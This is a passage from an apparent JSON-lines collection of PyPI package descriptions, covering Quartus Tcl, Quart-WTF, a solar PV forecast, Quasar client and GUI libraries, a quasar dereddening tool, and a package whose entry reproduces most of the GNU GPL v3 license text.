Tcl lists.InstallationInstall viapip:pipinstallquartustclDemoYou can start a demo Python REPL by running the package as a script:python3-mquartustclThequartustclsubshell is exposed in a variable namedquartus.Basic UseInstantiate aQuartusTclobject to start a shell. Then, call methods\non it.quartus=quartustcl.QuartusTcl()three=quartus.expr('1 + 2')assertthree=='3'If you are expecting a list as a result, useparseto turn Tcl lists\ninto Python lists.devnames=quartus.parse(quartus.get_device_names(hardware_name=\"Foo Bar\"))In the Tcl subshell, this runsget_device_names-hardware_name{FooBar}and parses the result into a Python list.For more detailed information, pleaseread the documentation."} +{"package": "quart-wtf", "pacakge-description": "Quart-WTFSimple integration of Quart and WTForms. Including CSRF and file uploading."} +{"package": "quart-wtforms", "pacakge-description": "Quart-WTFSimple integration of Quart and WTForms. 
Including CSRF and file uploading.DocumentationThe documentation for Quart-WTF is availablehere."} +{"package": "quartz", "pacakge-description": "No description available on PyPI."} +{"package": "quartz-solar-forecast", "pacakge-description": "Quartz Solar ForecastThe aim of the project is to build an open source PV forecast that is free and easy to use.\nThe forecast provides the expected generation inkwfor 0 to 48 hours for a single PV site.Open Climate Fix also provides a commercial PV forecast, please get in touch atquartz.support@openclimatefix.orgThe current model uses GFS or ICON NWPs to predict the solar generation at a sitefromquartz_solar_forecast.forecastimportrun_forecastfromquartz_solar_forecast.pydantic_modelsimportPVSite# make a pv site objectsite=PVSite(latitude=51.75,longitude=-1.25,capacity_kwp=1.25)# run model, uses ICON NWP data by defaultpredictions_df=run_forecast(site=site,ts='2023-11-01')Which gives the following predictionInstallationThe source code is currently hosted on GitHub at:https://github.com/openclimatefix/Open-Source-Quartz-Solar-ForecastBinary installers for the latest released version are available at the Python Package Index (PyPI)pipinstallquartz-solar-forecastYou might need to install the following packages firstcondainstall-cconda-forgepyresampleThis can solve thebug: ___kmpc_for_static_fini.ModelThe model is a gradient boosted tree model and uses 9 NWP variables.\nIt is trained on 25,000 PV sites with over 5 years of PV history, which is availablehere.\nThe training of this model is handled inpv-site-predictionTODO - we need to benchmark this forecast.The 9 NWP variables, from Open-Meteo documentation, are mentioned above with their appropariate units.Visibility (km), or vis: Distance at which objects can be clearly seen. Can affect the amount of sunlight reaching solar panels.Wind Speed at 10 meters (km/h), or si10 : Wind speed measured at a height of 10 meters above ground level. Important for understanding weather conditions and potential impacts on solar panels.Temperature at 2 meters (\u00b0C), or t : Air temperature measure at 2 meters above the ground. Can affect the efficiency of PV systems.Precipiration (mm), or prate : Precipitation (rain, snow, sleet, etc.). Helps to predict cloud cover and potentiel reductions in solar irradiance.Shortwave Radiation (W/m\u00b2), or dswrf: Solar radiation in the shortwave spectrum reaching the Earth's surface. Measure of the potential solar energy available for PV systems.Direct Radiation (W/m\u00b2)or dlwrf: Longwave (infrared) radiation emitted by the Earth back into the atmosphere.confirm it is correctCloud Cover low (%), or lcc: Percentage of the sky covered by clouds at low altitudes. Impacts the amount of solar radiation reachign the ground, and similarly the PV system.Cloud Cover mid (%), or mcc : Percentage of the sky covered by clouds at mid altitudes.Cloud Cover high (%), or lcc : Percentage of the sky covered by clouds at high altitudeWe also use the following featurespoa_global: The plane of array irradiance, which is the amount of solar radiation that strikes a solar panel.poa_global_now_is_zero: A boolean variable that is true if the poa_global is zero at the current time. 
This is used to help the model learn that the PV generation is zero at night.capacity (kw): The capacity of the PV system in kw.The model also has a feature to check if these variables are NaNs or not.The model also uses the following variables, which are currently all set to nanrecent_power: The mean power over the last 30 minutesh_mean: The mean of the recent pv data over the last 7 daysh_median: The median of the recent pv data over the last 7 daysh_max: The max of the recent pv data over the last 7 daysKnown restrictionsThe model is trained onUK MetOfficeNWPs, but when running inference we useGFSdata fromOpen-meteo. The differences between GFS and UK MetOffice could led to some odd behaviours.It looks like the GFS data on Open-Meteo is only available for free for the last 3 months.EvaluationTo evaluate the model we use theUK PVdataset and theICON NWPdataset.\nAll the data is publicly available and the evaluation script can be run with the following commandpythonscripts/run_evaluation.pyThe test dataset we used is defined inquartz_solar_forecast/dataset/testset.csv.\nThis contains 50 PV sites, which 50 unique timestamps. The data is from 2021.The results of the evaluation are as follows\nThe MAE is 0.1906 kw across all horizons.HorizonsMAE [kw]MAE [%]00.202 +- 0.036.210.211 +- 0.036.420.216 +- 0.036.53 - 40.211 +- 0.026.35 - 80.191 +- 0.0169 - 160.161 +- 0.01517 - 240.173 +- 0.015.324 - 480.201 +- 0.016.1If we exclude nighttime, then the average MAE [%] from 0 to 36 forecast hours is 13.0%.Notes:The MAE in % is the MAE divided by the capacity of the PV site. We acknowledge there are a number of different ways to do this.It is slightly surprising that the 0-hour forecast horizon and the 24-48 hour horizon have a similar MAE.\nThis may be because the model is trained expecting live PV data, but currently in this project we provide no live PV data.AbbreviationsNWP: Numerical Weather PredictionsGFS: Global Forecast SystemPV: PhotovoltaicMAE: Mean Absolute ErrorICON: ICOsahedral NonhydrostaticKW: KilowattContributionWe welcome other models.Contributors \u2728Thanks goes to these wonderful people (emoji key):Peter Dudfield\ud83d\udcbbMegawattz\ud83e\udd14\ud83d\udce2EdFage\ud83d\udcd6\ud83d\udcbbChloe Pilon Vaillancourt\ud83d\udcd6rachel tipton\ud83d\udce2armenbod\ud83d\udd8b\ud83d\udcbbShreyas Udaya\ud83d\udcd6Aryan Bhosale\ud83d\udcd6Francesco\ud83d\udcbbThis project follows theall-contributorsspecification. Contributions of any kind welcome!"} +{"package": "quasar-client", "pacakge-description": "Quasar Python ClientInstallationpipinstallquasar-clientUsagefromquasar_clientimportQuasarquasar_base=\"URL for Quasar-compatible server\"quasar=Quasar(quasar_base=quasar_base)# Use OpenAI-compatible interfaces...chat_completion=quasar.chat.completions.create(messages=[{\"role\":\"user\",\"content\":\"Hello quasar\",}],model=\"gpt-3.5-turbo\",)# Use Quasar-specific interfaces like NER...entities=quasar.tagger.tag(task=\"ner\",text=\"Yurts Technologies is based in SF.\")Quasar provides a convenient interface for common RAG APIs. In addition to the OpenAI APIs, the client supports:EntitiesEmbeddingRankingAsynchronous SupportFor developers looking to leverage asynchronous programming for improved performance and non-blocking IO operations, Quasar introduces async support for its APIs. 
This allows you to efficiently handle large volumes of requests and data processing in a non-blocking manner.Async Usage ExampleBelow is an example of how to use the asynchronous interface for embedding texts:fromquasar_clientimportAsyncQuasarquasar_base=\"URL for Quasar-compatible server\"quasar=AsyncQuasar(quasar_base=quasar_base)# Asynchronously embed textsasyncdefembed_texts(texts):embeddings=awaitquasar.embedding.embed(texts=texts)returnembeddings# Example textstexts=[\"Hello, world!\",\"How are you?\"]# Remember to run this in an async contextThis async support ensures that your application can scale more efficiently, handling concurrent operations without the need for complex threading or multiprocessing setups.Sync and Async Resource ModulesQuasar provides both synchronous and asynchronous resource classes to cater to different use cases and preferences. Whether you prefer the simplicity of synchronous code or the efficiency of asynchronous operations, Quasar has you covered.# Synchronous Embedding Resource ClassclassSyncEmbeddingResource(SyncResource):...# Asynchronous Embedding Resource ClassclassAsyncEmbeddingResource(AsyncResource):..."} +{"package": "quasardb", "pacakge-description": "No description available on PyPI."} +{"package": "quasargui", "pacakge-description": "#QuasarGUI\nA user-friendly package for making awesome-looking desktop apps in Python.Read thefull documentationhere.Compatibility:It runs flawlessly on Mac, 10.13.6+ (High Sierra or newer).Linux compatibility: unknown, it depends oncefpython3's andpywebview's linux compatibility.Windows compatibility: compatible with Windows 7, on Windows 10pywebviewdid not work (2021-07-30).Usage:This GUI library creates a window with a html view, in which Quasar Vue system is running. But don't worry, you can build up everything in python.A window is built up of Component's and the components correspond to components described in (https://quasar.dev/vue-components/). Quasar is very well-documented and so it makes this project well-documented. From Quasar's help page you can use all props, classes, as well as you can easily customize the look of your Components using CSS.You can react to user events using callbacks. 
(See: simple greeter app.)###Hello worldimportquasarguifromquasarguiimport*layout=QLayout([\"Hello World!\"])quasargui.run(layout)###Simple greeter appThis app demonstrates how you can build up a simple form and use the form's data to run your code.importquasarguifromquasarguiimportDiv,QInput,QButton,Modelname=Model()defdisplay_notification():layout.api.plugins.notify(message=f'Hello,{name.value}!')layout=Div(styles={'max-width':'30em','margin-left':'auto','margin-right':'auto'},classes='q-mt-xl q-pt-lg text-center',children=[\"What's your name?\",QInput('Name',name),QButton('Submit',classes='text-primary',props={'size':'lg'},events={'click':display_notification})])quasargui.run(layout)# Shows a window with the layout.If you're interested how you can easily style buttons, check outQuasar's button apiQuasar's input apiFrom Quasar's pageany prop can be added to the corresponding quasargui component's props,any classes can be added to classes andany events can be added to events (without the @).Dynamic props (on Quasar's page it is in \":prop\" format) can be added usingModel:fromquasarguiimport*my_value=Model('my str')props={'string-prop':my_value}Model works with any json-like type (str, bool, int, list, dict).See further examples in the examples folder.Installation:At the moment this project is just a demo, featuring only a few components,\nbut it will be available on pip soon.Dependencies:pywebviewLicense:MIT licenseConcepts of quasarguiQuasargui package closely follows the structure of Quasar, and you can also easily integrate any Vue component. The most important is to have handy defaults so you only need to write code when you want to customize.The GUI builds up itself fromComponent's andModel's. To understand the logic of all components, let's examine a typical component.fromquasarguiimport*loading=Model(False)defconnect():loading.value=True;print('Connect button clicked')button=QButton(label='Connect',classes='q-ma-md',styles={'opacity':0.8},props={'no-caps':True,'loading':loading},events={'click':connect},children=[Slot('loading',[QSpinner(appearance='dots')])])In Vue,button's definition corresponds to:The common attributes of aComponentare:classes: custom css classes, separated by space (html class attribute)styles: custom styles applied (html style attribute)props: all the quasar attrs (no-caps is a constant attribute, loading is an attribute that is bound to a variable.)events: all the quasar \"@\" attrs. Events call the assigned callback in python.children: are list of the html children, everything that is between .... So,slotsare also set here withSlot('slot-name', [...list of children...]).Convenience:Argument order follows convenience. Some commonly used props of a component such aslabelare given a \"shortcut\" parameter, and even put into first position, so you don't need to type out its name.WritingQButton('OK')is the same asQButton(props={'label': 'OK'})but more concise.Type system:All arguments are typed so you can catch most of the errors with a type-checker. This is the benefit of having props and events separated.Formulas: If there's a formula in a Vue attribute, you need to useComputed.\nIf the componentrequiresJavaScript function to be used, you can resort toJSRaw.fromquasarguiimport*x,y=Model(2),Model(3)QInput(label=Computed(lambdax,y:f'{x}+{y}=',x,y),props={'rules':JSRaw(\"[value => value>0 || 'Enter a positive number']\")})Vue directives:If a component works withv-modelthen you can access it via themodelparameter. 
Otherv-'s such asv-ifcan be accessed as props.\nAdditionally,prop modifiersare simply put after the prop name as in Vue.Computed values:ModelandComputedwork like an excel sheet, whereModelis the normal data,Computedare the formulas. Everytime aModelchanges, it updates all its dependentComputedvalues. You can also hook intoModel's changes by adding a callback:fromquasarguiimport*model=Model()model.add_callback(lambda:print('model changed'))Convenience classesFor all the typical Python data-types quasargui package has a Component, designed to provide a convenient input.basic types: InputStr, InputInt, InputFloat, InputBool, InputListlist: InputList - tags, multi-select or checkboxes.choices: InputChoice - radio, button-group or select.file path: InputFile.datatime (data, time and datatime): InputDate, InputTime, InputDataTime are input fields with calendar/clock popup.hex color: InputColorOverriding defaultsSome other components try and guess your intent (QDrawer adds a sandwich menu button for itself, QHeader wraps its arguments into QToolbar&ToolbarTitle if necessary.)However, every automatic guess and default can be overridden. Some have parameter to disable (eg. automatic sandwich menu for QDrawer).\nIn components that have defaults, you can override default withdel YourComponent.defaults['props']['your-prop'].To remove a slot, addRemoveSlot('name')tochildren.Detailed documentationRead thefull documentationhere."} +{"package": "quasar-unred", "pacakge-description": "quasar_unredQuasar Unred is a Python library for determining the E(B-V) value of observed quasar spectra. It can also be used to appropriately deredden these spectra.Installationpip install quasar_unredqso_template.txt must be downloaded and in working directory for load_template() to work with no argument.UsageA simple demonstration is shown in quasar_unred_demo.ipynbIt is assumed that qso_template.txt and ukfs1037.p0236.final.dat are both downloaded and in your working directory.DependenciesDependencies for use are numpy, scipy, astropy, and dust_extinctionContributingPull requests are welcome. For major changes, please open an issue first\nto discuss what you would like to change.LicenseThis project is Copyright (c) John Klawitter and Eilat Glikman and licensed under the terms of the BSD 3-Clause license."} +{"package": "quasarx", "pacakge-description": "QuasarQuasar: Mistral, mastering mathematical reasoning.Features:Mistral7b finetuned on high quality tokens for stellar mathematical reasoning.Mistral7b extended to 16k seq and soon 32k and then 65k!High Quality reasoning for all reasoning intensive tasks.ArchitectureInstallUsageLicenseMIT"} +{"package": "quasi", "pacakge-description": "Copyright (C) 2007 Free Software Foundation, Inc. Everyone is permitted to copy and distribute verbatim copiesof this license document, but changing it is not allowed.PreambleThe GNU General Public License is a free, copyleft license forsoftware and other kinds of works.The licenses for most software and other practical works are designedto take away your freedom to share and change the works. By contrast,the GNU General Public License is intended to guarantee your freedom toshare and change all versions of a program--to make sure it remains freesoftware for all its users. We, the Free Software Foundation, use theGNU General Public License for most of our software; it applies also toany other work released this way by its authors. You can apply it toyour programs, too.When we speak of free software, we are referring to freedom, notprice. 
Our General Public Licenses are designed to make sure that youhave the freedom to distribute copies of free software (and charge forthem if you wish), that you receive source code or can get it if youwant it, that you can change the software or use pieces of it in newfree programs, and that you know you can do these things.To protect your rights, we need to prevent others from denying youthese rights or asking you to surrender the rights. Therefore, you havecertain responsibilities if you distribute copies of the software, or ifyou modify it: responsibilities to respect the freedom of others.For example, if you distribute copies of such a program, whethergratis or for a fee, you must pass on to the recipients the samefreedoms that you received. You must make sure that they, too, receiveor can get the source code. And you must show them these terms so theyknow their rights.Developers that use the GNU GPL protect your rights with two steps:(1) assert copyright on the software, and (2) offer you this Licensegiving you legal permission to copy, distribute and/or modify it.For the developers' and authors' protection, the GPL clearly explainsthat there is no warranty for this free software. For both users' andauthors' sake, the GPL requires that modified versions be marked aschanged, so that their problems will not be attributed erroneously toauthors of previous versions.Some devices are designed to deny users access to install or runmodified versions of the software inside them, although the manufacturercan do so. This is fundamentally incompatible with the aim ofprotecting users' freedom to change the software. The systematicpattern of such abuse occurs in the area of products for individuals touse, which is precisely where it is most unacceptable. Therefore, wehave designed this version of the GPL to prohibit the practice for thoseproducts. If such problems arise substantially in other domains, westand ready to extend this provision to those domains in future versionsof the GPL, as needed to protect the freedom of users.Finally, every program is threatened constantly by software patents.States should not allow patents to restrict development and use ofsoftware on general-purpose computers, but in those that do, we wish toavoid the special danger that patents applied to a free program couldmake it effectively proprietary. To prevent this, the GPL assures thatpatents cannot be used to render the program non-free.The precise terms and conditions for copying, distribution andmodification follow.TERMS AND CONDITIONS0. Definitions.\"This License\" refers to version 3 of the GNU General Public License.\"Copyright\" also means copyright-like laws that apply to other kinds ofworks, such as semiconductor masks.\"The Program\" refers to any copyrightable work licensed under thisLicense. Each licensee is addressed as \"you\". \"Licensees\" and\"recipients\" may be individuals or organizations.To \"modify\" a work means to copy from or adapt all or part of the workin a fashion requiring copyright permission, other than the making of anexact copy. The resulting work is called a \"modified version\" of theearlier work or a work \"based on\" the earlier work.A \"covered work\" means either the unmodified Program or a work basedon the Program.To \"propagate\" a work means to do anything with it that, withoutpermission, would make you directly or secondarily liable forinfringement under applicable copyright law, except executing it on acomputer or modifying a private copy. 
Propagation includes copying,distribution (with or without modification), making available to thepublic, and in some countries other activities as well.To \"convey\" a work means any kind of propagation that enables otherparties to make or receive copies. Mere interaction with a user througha computer network, with no transfer of a copy, is not conveying.An interactive user interface displays \"Appropriate Legal Notices\"to the extent that it includes a convenient and prominently visiblefeature that (1) displays an appropriate copyright notice, and (2)tells the user that there is no warranty for the work (except to theextent that warranties are provided), that licensees may convey thework under this License, and how to view a copy of this License. Ifthe interface presents a list of user commands or options, such as amenu, a prominent item in the list meets this criterion.1. Source Code.The \"source code\" for a work means the preferred form of the workfor making modifications to it. \"Object code\" means any non-sourceform of a work.A \"Standard Interface\" means an interface that either is an officialstandard defined by a recognized standards body, or, in the case ofinterfaces specified for a particular programming language, one thatis widely used among developers working in that language.The \"System Libraries\" of an executable work include anything, otherthan the work as a whole, that (a) is included in the normal form ofpackaging a Major Component, but which is not part of that MajorComponent, and (b) serves only to enable use of the work with thatMajor Component, or to implement a Standard Interface for which animplementation is available to the public in source code form. A\"Major Component\", in this context, means a major essential component(kernel, window system, and so on) of the specific operating system(if any) on which the executable work runs, or a compiler used toproduce the work, or an object code interpreter used to run it.The \"Corresponding Source\" for a work in object code form means allthe source code needed to generate, install, and (for an executablework) run the object code and to modify the work, including scripts tocontrol those activities. However, it does not include the work'sSystem Libraries, or general-purpose tools or generally available freeprograms which are used unmodified in performing those activities butwhich are not part of the work. For example, Corresponding Sourceincludes interface definition files associated with source files forthe work, and the source code for shared libraries and dynamicallylinked subprograms that the work is specifically designed to require,such as by intimate data communication or control flow between thosesubprograms and other parts of the work.The Corresponding Source need not include anything that userscan regenerate automatically from other parts of the CorrespondingSource.The Corresponding Source for a work in source code form is thatsame work.2. Basic Permissions.All rights granted under this License are granted for the term ofcopyright on the Program, and are irrevocable provided the statedconditions are met. This License explicitly affirms your unlimitedpermission to run the unmodified Program. The output from running acovered work is covered by this License only if the output, given itscontent, constitutes a covered work. 
This License acknowledges yourrights of fair use or other equivalent, as provided by copyright law.You may make, run and propagate covered works that you do notconvey, without conditions so long as your license otherwise remainsin force. You may convey covered works to others for the sole purposeof having them make modifications exclusively for you, or provide youwith facilities for running those works, provided that you comply withthe terms of this License in conveying all material for which you donot control copyright. Those thus making or running the covered worksfor you must do so exclusively on your behalf, under your directionand control, on terms that prohibit them from making any copies ofyour copyrighted material outside their relationship with you.Conveying under any other circumstances is permitted solely underthe conditions stated below. Sublicensing is not allowed; section 10makes it unnecessary.3. Protecting Users' Legal Rights From Anti-Circumvention Law.No covered work shall be deemed part of an effective technologicalmeasure under any applicable law fulfilling obligations under article11 of the WIPO copyright treaty adopted on 20 December 1996, orsimilar laws prohibiting or restricting circumvention of suchmeasures.When you convey a covered work, you waive any legal power to forbidcircumvention of technological measures to the extent such circumventionis effected by exercising rights under this License with respect tothe covered work, and you disclaim any intention to limit operation ormodification of the work as a means of enforcing, against the work'susers, your or third parties' legal rights to forbid circumvention oftechnological measures.4. Conveying Verbatim Copies.You may convey verbatim copies of the Program's source code as youreceive it, in any medium, provided that you conspicuously andappropriately publish on each copy an appropriate copyright notice;keep intact all notices stating that this License and anynon-permissive terms added in accord with section 7 apply to the code;keep intact all notices of the absence of any warranty; and give allrecipients a copy of this License along with the Program.You may charge any price or no price for each copy that you convey,and you may offer support or warranty protection for a fee.5. Conveying Modified Source Versions.You may convey a work based on the Program, or the modifications toproduce it from the Program, in the form of source code under theterms of section 4, provided that you also meet all of these conditions:a) The work must carry prominent notices stating that you modifiedit, and giving a relevant date.b) The work must carry prominent notices stating that it isreleased under this License and any conditions added under section7. This requirement modifies the requirement in section 4 to\"keep intact all notices\".c) You must license the entire work, as a whole, under thisLicense to anyone who comes into possession of a copy. ThisLicense will therefore apply, along with any applicable section 7additional terms, to the whole of the work, and all its parts,regardless of how they are packaged. 
This License gives nopermission to license the work in any other way, but it does notinvalidate such permission if you have separately received it.d) If the work has interactive user interfaces, each must displayAppropriate Legal Notices; however, if the Program has interactiveinterfaces that do not display Appropriate Legal Notices, yourwork need not make them do so.A compilation of a covered work with other separate and independentworks, which are not by their nature extensions of the covered work,and which are not combined with it such as to form a larger program,in or on a volume of a storage or distribution medium, is called an\"aggregate\" if the compilation and its resulting copyright are notused to limit the access or legal rights of the compilation's usersbeyond what the individual works permit. Inclusion of a covered workin an aggregate does not cause this License to apply to the otherparts of the aggregate.6. Conveying Non-Source Forms.You may convey a covered work in object code form under the termsof sections 4 and 5, provided that you also convey themachine-readable Corresponding Source under the terms of this License,in one of these ways:a) Convey the object code in, or embodied in, a physical product(including a physical distribution medium), accompanied by theCorresponding Source fixed on a durable physical mediumcustomarily used for software interchange.b) Convey the object code in, or embodied in, a physical product(including a physical distribution medium), accompanied by awritten offer, valid for at least three years and valid for aslong as you offer spare parts or customer support for that productmodel, to give anyone who possesses the object code either (1) acopy of the Corresponding Source for all the software in theproduct that is covered by this License, on a durable physicalmedium customarily used for software interchange, for a price nomore than your reasonable cost of physically performing thisconveying of source, or (2) access to copy theCorresponding Source from a network server at no charge.c) Convey individual copies of the object code with a copy of thewritten offer to provide the Corresponding Source. Thisalternative is allowed only occasionally and noncommercially, andonly if you received the object code with such an offer, in accordwith subsection 6b.d) Convey the object code by offering access from a designatedplace (gratis or for a charge), and offer equivalent access to theCorresponding Source in the same way through the same place at nofurther charge. You need not require recipients to copy theCorresponding Source along with the object code. If the place tocopy the object code is a network server, the Corresponding Sourcemay be on a different server (operated by you or a third party)that supports equivalent copying facilities, provided you maintainclear directions next to the object code saying where to find theCorresponding Source. 
Regardless of what server hosts theCorresponding Source, you remain obligated to ensure that it isavailable for as long as needed to satisfy these requirements.e) Convey the object code using peer-to-peer transmission, providedyou inform other peers where the object code and CorrespondingSource of the work are being offered to the general public at nocharge under subsection 6d.A separable portion of the object code, whose source code is excludedfrom the Corresponding Source as a System Library, need not beincluded in conveying the object code work.A \"User Product\" is either (1) a \"consumer product\", which means anytangible personal property which is normally used for personal, family,or household purposes, or (2) anything designed or sold for incorporationinto a dwelling. In determining whether a product is a consumer product,doubtful cases shall be resolved in favor of coverage. For a particularproduct received by a particular user, \"normally used\" refers to atypical or common use of that class of product, regardless of the statusof the particular user or of the way in which the particular useractually uses, or expects or is expected to use, the product. A productis a consumer product regardless of whether the product has substantialcommercial, industrial or non-consumer uses, unless such uses representthe only significant mode of use of the product.\"Installation Information\" for a User Product means any methods,procedures, authorization keys, or other information required to installand execute modified versions of a covered work in that User Product froma modified version of its Corresponding Source. The information mustsuffice to ensure that the continued functioning of the modified objectcode is in no case prevented or interfered with solely becausemodification has been made.If you convey an object code work under this section in, or with, orspecifically for use in, a User Product, and the conveying occurs aspart of a transaction in which the right of possession and use of theUser Product is transferred to the recipient in perpetuity or for afixed term (regardless of how the transaction is characterized), theCorresponding Source conveyed under this section must be accompaniedby the Installation Information. But this requirement does not applyif neither you nor any third party retains the ability to installmodified object code on the User Product (for example, the work hasbeen installed in ROM).The requirement to provide Installation Information does not include arequirement to continue to provide support service, warranty, or updatesfor a work that has been modified or installed by the recipient, or forthe User Product in which it has been modified or installed. Access to anetwork may be denied when the modification itself materially andadversely affects the operation of the network or violates the rules andprotocols for communication across the network.Corresponding Source conveyed, and Installation Information provided,in accord with this section must be in a format that is publiclydocumented (and with an implementation available to the public insource code form), and must require no special password or key forunpacking, reading or copying.7. Additional Terms.\"Additional permissions\" are terms that supplement the terms of thisLicense by making exceptions from one or more of its conditions.Additional permissions that are applicable to the entire Program shallbe treated as though they were included in this License, to the extentthat they are valid under applicable law. 
If additional permissionsapply only to part of the Program, that part may be used separatelyunder those permissions, but the entire Program remains governed bythis License without regard to the additional permissions.When you convey a copy of a covered work, you may at your optionremove any additional permissions from that copy, or from any part ofit. (Additional permissions may be written to require their ownremoval in certain cases when you modify the work.) You may placeadditional permissions on material, added by you to a covered work,for which you have or can give appropriate copyright permission.Notwithstanding any other provision of this License, for material youadd to a covered work, you may (if authorized by the copyright holders ofthat material) supplement the terms of this License with terms:a) Disclaiming warranty or limiting liability differently from theterms of sections 15 and 16 of this License; orb) Requiring preservation of specified reasonable legal notices orauthor attributions in that material or in the Appropriate LegalNotices displayed by works containing it; orc) Prohibiting misrepresentation of the origin of that material, orrequiring that modified versions of such material be marked inreasonable ways as different from the original version; ord) Limiting the use for publicity purposes of names of licensors orauthors of the material; ore) Declining to grant rights under trademark law for use of sometrade names, trademarks, or service marks; orf) Requiring indemnification of licensors and authors of thatmaterial by anyone who conveys the material (or modified versions ofit) with contractual assumptions of liability to the recipient, forany liability that these contractual assumptions directly impose onthose licensors and authors.All other non-permissive additional terms are considered \"furtherrestrictions\" within the meaning of section 10. If the Program as youreceived it, or any part of it, contains a notice stating that it isgoverned by this License along with a term that is a furtherrestriction, you may remove that term. If a license document containsa further restriction but permits relicensing or conveying under thisLicense, you may add to a covered work material governed by the termsof that license document, provided that the further restriction doesnot survive such relicensing or conveying.If you add terms to a covered work in accord with this section, youmust place, in the relevant source files, a statement of theadditional terms that apply to those files, or a notice indicatingwhere to find the applicable terms.Additional terms, permissive or non-permissive, may be stated in theform of a separately written license, or stated as exceptions;the above requirements apply either way.8. Termination.You may not propagate or modify a covered work except as expresslyprovided under this License. 
Any attempt otherwise to propagate ormodify it is void, and will automatically terminate your rights underthis License (including any patent licenses granted under the thirdparagraph of section 11).However, if you cease all violation of this License, then yourlicense from a particular copyright holder is reinstated (a)provisionally, unless and until the copyright holder explicitly andfinally terminates your license, and (b) permanently, if the copyrightholder fails to notify you of the violation by some reasonable meansprior to 60 days after the cessation.Moreover, your license from a particular copyright holder isreinstated permanently if the copyright holder notifies you of theviolation by some reasonable means, this is the first time you havereceived notice of violation of this License (for any work) from thatcopyright holder, and you cure the violation prior to 30 days afteryour receipt of the notice.Termination of your rights under this section does not terminate thelicenses of parties who have received copies or rights from you underthis License. If your rights have been terminated and not permanentlyreinstated, you do not qualify to receive new licenses for the samematerial under section 10.9. Acceptance Not Required for Having Copies.You are not required to accept this License in order to receive orrun a copy of the Program. Ancillary propagation of a covered workoccurring solely as a consequence of using peer-to-peer transmissionto receive a copy likewise does not require acceptance. However,nothing other than this License grants you permission to propagate ormodify any covered work. These actions infringe copyright if you donot accept this License. Therefore, by modifying or propagating acovered work, you indicate your acceptance of this License to do so.10. Automatic Licensing of Downstream Recipients.Each time you convey a covered work, the recipient automaticallyreceives a license from the original licensors, to run, modify andpropagate that work, subject to this License. You are not responsiblefor enforcing compliance by third parties with this License.An \"entity transaction\" is a transaction transferring control of anorganization, or substantially all assets of one, or subdividing anorganization, or merging organizations. If propagation of a coveredwork results from an entity transaction, each party to thattransaction who receives a copy of the work also receives whateverlicenses to the work the party's predecessor in interest had or couldgive under the previous paragraph, plus a right to possession of theCorresponding Source of the work from the predecessor in interest, ifthe predecessor has it or can get it with reasonable efforts.You may not impose any further restrictions on the exercise of therights granted or affirmed under this License. For example, you maynot impose a license fee, royalty, or other charge for exercise ofrights granted under this License, and you may not initiate litigation(including a cross-claim or counterclaim in a lawsuit) alleging thatany patent claim is infringed by making, using, selling, offering forsale, or importing the Program or any portion of it.11. Patents.A \"contributor\" is a copyright holder who authorizes use under thisLicense of the Program or a work on which the Program is based. 
Thework thus licensed is called the contributor's \"contributor version\".A contributor's \"essential patent claims\" are all patent claimsowned or controlled by the contributor, whether already acquired orhereafter acquired, that would be infringed by some manner, permittedby this License, of making, using, or selling its contributor version,but do not include claims that would be infringed only as aconsequence of further modification of the contributor version. Forpurposes of this definition, \"control\" includes the right to grantpatent sublicenses in a manner consistent with the requirements ofthis License.Each contributor grants you a non-exclusive, worldwide, royalty-freepatent license under the contributor's essential patent claims, tomake, use, sell, offer for sale, import and otherwise run, modify andpropagate the contents of its contributor version.In the following three paragraphs, a \"patent license\" is any expressagreement or commitment, however denominated, not to enforce a patent(such as an express permission to practice a patent or covenant not tosue for patent infringement). To \"grant\" such a patent license to aparty means to make such an agreement or commitment not to enforce apatent against the party.If you convey a covered work, knowingly relying on a patent license,and the Corresponding Source of the work is not available for anyoneto copy, free of charge and under the terms of this License, through apublicly available network server or other readily accessible means,then you must either (1) cause the Corresponding Source to be soavailable, or (2) arrange to deprive yourself of the benefit of thepatent license for this particular work, or (3) arrange, in a mannerconsistent with the requirements of this License, to extend the patentlicense to downstream recipients. \"Knowingly relying\" means you haveactual knowledge that, but for the patent license, your conveying thecovered work in a country, or your recipient's use of the covered workin a country, would infringe one or more identifiable patents in thatcountry that you have reason to believe are valid.If, pursuant to or in connection with a single transaction orarrangement, you convey, or propagate by procuring conveyance of, acovered work, and grant a patent license to some of the partiesreceiving the covered work authorizing them to use, propagate, modifyor convey a specific copy of the covered work, then the patent licenseyou grant is automatically extended to all recipients of the coveredwork and works based on it.A patent license is \"discriminatory\" if it does not include withinthe scope of its coverage, prohibits the exercise of, or isconditioned on the non-exercise of one or more of the rights that arespecifically granted under this License. 
You may not convey a coveredwork if you are a party to an arrangement with a third party that isin the business of distributing software, under which you make paymentto the third party based on the extent of your activity of conveyingthe work, and under which the third party grants, to any of theparties who would receive the covered work from you, a discriminatorypatent license (a) in connection with copies of the covered workconveyed by you (or copies made from those copies), or (b) primarilyfor and in connection with specific products or compilations thatcontain the covered work, unless you entered into that arrangement,or that patent license was granted, prior to 28 March 2007.Nothing in this License shall be construed as excluding or limitingany implied license or other defenses to infringement that mayotherwise be available to you under applicable patent law.12. No Surrender of Others' Freedom.If conditions are imposed on you (whether by court order, agreement orotherwise) that contradict the conditions of this License, they do notexcuse you from the conditions of this License. If you cannot convey acovered work so as to satisfy simultaneously your obligations under thisLicense and any other pertinent obligations, then as a consequence you maynot convey it at all. For example, if you agree to terms that obligate youto collect a royalty for further conveying from those to whom you conveythe Program, the only way you could satisfy both those terms and thisLicense would be to refrain entirely from conveying the Program.13. Use with the GNU Affero General Public License.Notwithstanding any other provision of this License, you havepermission to link or combine any covered work with a work licensedunder version 3 of the GNU Affero General Public License into a singlecombined work, and to convey the resulting work. The terms of thisLicense will continue to apply to the part which is the covered work,but the special requirements of the GNU Affero General Public License,section 13, concerning interaction through a network will apply to thecombination as such.14. Revised Versions of this License.The Free Software Foundation may publish revised and/or new versions ofthe GNU General Public License from time to time. Such new versions willbe similar in spirit to the present version, but may differ in detail toaddress new problems or concerns.Each version is given a distinguishing version number. If theProgram specifies that a certain numbered version of the GNU GeneralPublic License \"or any later version\" applies to it, you have theoption of following the terms and conditions either of that numberedversion or of any later version published by the Free SoftwareFoundation. If the Program does not specify a version number of theGNU General Public License, you may choose any version ever publishedby the Free Software Foundation.If the Program specifies that a proxy can decide which futureversions of the GNU General Public License can be used, that proxy'spublic statement of acceptance of a version permanently authorizes youto choose that version for the Program.Later license versions may give you additional or differentpermissions. However, no additional obligations are imposed on anyauthor or copyright holder as a result of your choosing to follow alater version.15. Disclaimer of Warranty.THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED 